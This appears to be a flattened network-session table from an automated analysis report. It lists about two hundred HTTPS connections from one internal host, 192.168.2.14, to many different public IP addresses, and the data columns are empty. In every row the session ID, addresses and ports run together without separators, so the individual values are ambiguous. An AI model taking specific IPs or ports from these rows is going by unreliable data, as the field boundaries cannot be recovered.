                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10209192.168.2.144550885.49.207.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10210192.168.2.1456376219.131.106.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10211192.168.2.1449308121.19.76.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10212192.168.2.1443492180.188.236.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10213192.168.2.1438332216.226.212.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10214192.168.2.1439694103.251.135.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10215192.168.2.146018857.35.120.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10216192.168.2.145792242.120.23.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10217192.168.2.1457220122.80.157.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10218192.168.2.143548894.110.130.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10219192.168.2.144095886.219.26.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10220192.168.2.1452660121.131.245.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10221192.168.2.1438608145.58.57.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10222192.168.2.1453572179.121.134.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10223192.168.2.1439936204.200.39.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10224192.168.2.1434578212.76.218.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10225192.168.2.146065299.24.124.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10226192.168.2.144439265.50.173.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10227192.168.2.144507497.130.175.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10228192.168.2.1437706220.45.71.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10229192.168.2.1456466133.139.232.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10230192.168.2.145437094.18.202.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10231192.168.2.14402548.217.88.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10232192.168.2.144122499.78.0.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10233192.168.2.143587873.241.230.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10234192.168.2.1448988134.118.0.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10235192.168.2.1453262171.145.155.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10236192.168.2.1455924150.206.121.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10237192.168.2.1460320216.34.252.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10238192.168.2.1434612131.6.3.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10239192.168.2.1454656133.39.170.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10240192.168.2.144283297.166.66.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10241192.168.2.1456844183.223.247.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10242192.168.2.1432810179.54.121.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10243192.168.2.1439702155.31.61.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10244192.168.2.145909470.124.247.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10245192.168.2.1451930116.172.231.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10246192.168.2.1442544209.55.80.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10247192.168.2.1448236194.117.51.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10248192.168.2.1445784168.164.141.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10249192.168.2.1456132115.128.248.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10250192.168.2.1440176175.137.254.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10251192.168.2.1438542131.10.174.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10252192.168.2.143285085.8.191.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10253192.168.2.1456450194.206.187.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10254192.168.2.144052617.64.71.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10255192.168.2.143351050.134.223.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10256192.168.2.1445136134.210.253.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10257192.168.2.144857812.67.73.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10258192.168.2.1450824190.223.127.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10259192.168.2.144983080.43.30.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10260192.168.2.1453610108.114.84.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10261192.168.2.145827869.199.163.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10262192.168.2.1455796136.175.227.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10263192.168.2.14443964.116.192.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10264192.168.2.145852865.223.79.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10265192.168.2.1445834166.48.213.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10266192.168.2.145152498.36.200.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10267192.168.2.144760287.197.15.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10268192.168.2.145467860.254.100.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10269192.168.2.144651274.23.127.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10270192.168.2.1436228108.205.14.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10271192.168.2.145596249.117.109.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10272192.168.2.1449784194.207.104.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10273192.168.2.1432934212.215.218.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10274192.168.2.1439104184.40.149.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10275192.168.2.145615873.87.34.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10276192.168.2.1457742138.236.241.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10277192.168.2.1451942154.180.163.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10278192.168.2.1435332136.209.210.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10279192.168.2.1451650103.68.75.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10280192.168.2.143906259.161.23.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10281192.168.2.144435098.219.24.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10282192.168.2.1441550213.6.133.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10283192.168.2.144127824.152.54.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10284192.168.2.1458840149.174.173.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10285192.168.2.1437606101.22.28.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10286192.168.2.1458426221.121.228.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10287192.168.2.1446590115.240.212.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10288192.168.2.144418247.3.4.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10289192.168.2.143376013.47.76.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10290192.168.2.1459852142.8.250.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10291192.168.2.1460722184.132.123.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10292192.168.2.1440404163.94.14.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10293192.168.2.1450756190.79.35.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10294192.168.2.1438394175.53.155.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10295192.168.2.145248270.23.115.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10296192.168.2.1440422142.161.165.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10297192.168.2.1453820161.139.136.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10298192.168.2.144914279.115.166.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10299192.168.2.1433270107.244.240.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10300192.168.2.143514034.27.152.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10301192.168.2.144586459.55.209.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10302192.168.2.1434542167.64.97.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10303192.168.2.1441182130.131.144.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10304192.168.2.1452446207.251.163.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10305192.168.2.145644250.15.193.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10306192.168.2.1444342182.44.230.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10307192.168.2.1445920132.41.150.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10308192.168.2.1452220159.89.216.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10309192.168.2.145039692.107.75.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10310192.168.2.1438072116.50.77.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10311192.168.2.1458630211.121.162.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10312192.168.2.143325431.150.24.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10313192.168.2.14594021.169.113.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10314192.168.2.1441734183.105.91.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10315192.168.2.145582844.229.20.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10316192.168.2.1452958139.228.183.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10317192.168.2.144241685.246.159.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10318192.168.2.1436944151.239.82.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10319192.168.2.1453266126.51.30.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10320192.168.2.1457736158.34.239.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10321192.168.2.144473483.98.179.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10322192.168.2.1442642143.61.87.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10323192.168.2.1434438173.146.20.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10324192.168.2.143942488.79.240.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10325192.168.2.1443834150.163.70.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10326192.168.2.1432942204.90.20.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10327192.168.2.1455418178.215.93.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10328192.168.2.1459528146.53.167.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10329192.168.2.1449952144.190.49.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10330192.168.2.1440350197.40.162.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10331192.168.2.145634494.249.30.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10332192.168.2.145973654.205.60.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10333192.168.2.144500017.98.88.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10334192.168.2.1446018171.118.131.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10335192.168.2.144967065.201.42.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10336192.168.2.1442418186.205.6.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10337192.168.2.1456294128.68.23.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10338192.168.2.144424684.166.188.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10339192.168.2.1459672125.230.80.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10340192.168.2.1435090136.147.178.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10341192.168.2.1455934200.72.102.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10342192.168.2.1436940160.146.157.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10343192.168.2.1459198106.150.152.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10344192.168.2.1454040150.214.124.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10345192.168.2.1439564107.193.236.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10346192.168.2.1453384150.171.90.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10347192.168.2.1434932158.21.249.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10348192.168.2.14557108.218.213.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10349192.168.2.1460742110.162.89.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10350192.168.2.145151232.159.201.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10351192.168.2.143331253.90.147.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10352192.168.2.1434950148.33.139.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10353192.168.2.1434710102.172.116.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10354192.168.2.1457044122.5.109.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10355192.168.2.144991057.70.43.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10356192.168.2.1438252205.194.51.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10357192.168.2.146061241.50.94.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10358192.168.2.145945473.149.101.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10359192.168.2.1450792195.253.164.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10360192.168.2.1441952211.29.157.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10361192.168.2.1436422192.89.237.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10362192.168.2.1449674210.68.218.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10363192.168.2.143662671.123.159.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10364192.168.2.143334249.5.172.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10365192.168.2.1448154155.2.102.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10366192.168.2.1435058192.85.141.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10367192.168.2.1443468195.38.245.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10368192.168.2.1438420117.133.205.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10369192.168.2.1449868166.106.51.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10370192.168.2.145414868.179.90.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10371192.168.2.1441646119.200.237.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10372192.168.2.1448926104.243.178.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10373192.168.2.144555053.241.89.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10374192.168.2.1444238177.59.27.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10375192.168.2.1450088116.172.117.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10376192.168.2.1437358162.141.155.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10377192.168.2.145598813.245.13.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10378192.168.2.1449006116.57.254.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10379192.168.2.1458988118.93.158.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10380192.168.2.144746274.40.206.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10381192.168.2.1449936136.143.25.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10382192.168.2.1433028118.80.144.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10383192.168.2.1449416173.44.60.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10384192.168.2.1446460188.8.171.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10385192.168.2.143540418.229.188.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10386192.168.2.1455988117.93.152.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10387192.168.2.1445050121.59.150.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10388192.168.2.143429674.206.65.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10389192.168.2.145355284.221.97.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10390192.168.2.145267624.175.8.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10391192.168.2.145168259.185.102.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10392192.168.2.1451606203.218.73.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10393192.168.2.144092632.222.74.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10394192.168.2.143904651.235.243.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10395192.168.2.143449643.171.61.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10396192.168.2.1456602183.191.29.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10397192.168.2.1444290218.37.112.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10398192.168.2.1456148167.15.121.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10399192.168.2.144373279.128.18.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10400192.168.2.1441858117.137.160.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10401192.168.2.143340083.70.243.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10402192.168.2.143317664.168.16.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10403192.168.2.1459530186.92.235.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10404192.168.2.1447570199.170.215.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10405192.168.2.144212478.26.243.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10406192.168.2.143766612.190.36.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10407192.168.2.14332988.145.157.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10408192.168.2.1452172110.249.35.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10409192.168.2.1455024116.121.145.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10410192.168.2.145517636.48.208.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10411192.168.2.1451316120.236.10.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10412192.168.2.143872295.14.58.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10413192.168.2.1447148223.10.241.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10414192.168.2.145940678.65.240.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10415192.168.2.145970868.148.195.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10416192.168.2.1448188190.23.198.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10417192.168.2.143782438.44.156.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10418192.168.2.1460718165.204.61.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10419192.168.2.143934431.62.196.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10420192.168.2.14414269.184.41.146443
                                                        TimestampBytes transferredDirectionData


